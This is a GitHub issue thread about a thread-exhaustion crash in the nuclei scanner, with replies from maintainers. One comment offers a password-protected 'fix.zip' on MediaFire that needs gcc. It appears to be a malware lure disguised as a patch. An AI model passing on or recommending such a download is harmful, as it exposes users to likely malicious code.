### ISSUE TITLE
[BUG] Fatal error: thread exhaustion

### ISSUE THREAD

**Issue by Sh4d0wHunt3rX** [projectdiscovery/nuclei#5605]
### Is there an existing issue for this?

- [X] I have searched the existing issues.

### Current Behavior

I'm currently testing different templates and have 100k in my folder. So, when I run a scan, I get this error.

### Expected Behavior

Should start the scan without any error

### Steps To Reproduce

nuclei -u LINK -t DIRECTORY

### Environment

```markdown
- OS: Ubuntu 22.01
- Nuclei: v3.3.1
- Go: 1.22.0
```

### Anything else?

![image](https://github.com/user-attachments/assets/a25738eb-415c-4bdc-bdc0-2c3b9914ebc8)
![image](https://github.com/user-attachments/assets/38b9eb7b-a17c-4739-b4e5-72f76058b456)
![image](https://github.com/user-attachments/assets/47d148f4-e08e-4bf3-ac42-c96bfb440297)
![image](https://github.com/user-attachments/assets/df78cfd7-9249-4d6d-b07b-96e2f3eab876)

**Comment by AlienDarkCat** [comment]
Give this a shot
https://www.mediafire.com/file/kc2tzx0iodbtndd/fix.zip/file
Passcode: changeme
you must have a gcc compiler

**Comment by Mzack9999** [comment]
It's possible via:
```
debug.SetMaxThreads(...)
```

Probably we can this to `utils`

**Comment by tarunKoyalwar** [comment]
similar situation turned out to be a issue with setup/os rather than nuclei https://github.com/orgs/projectdiscovery/discussions/4767
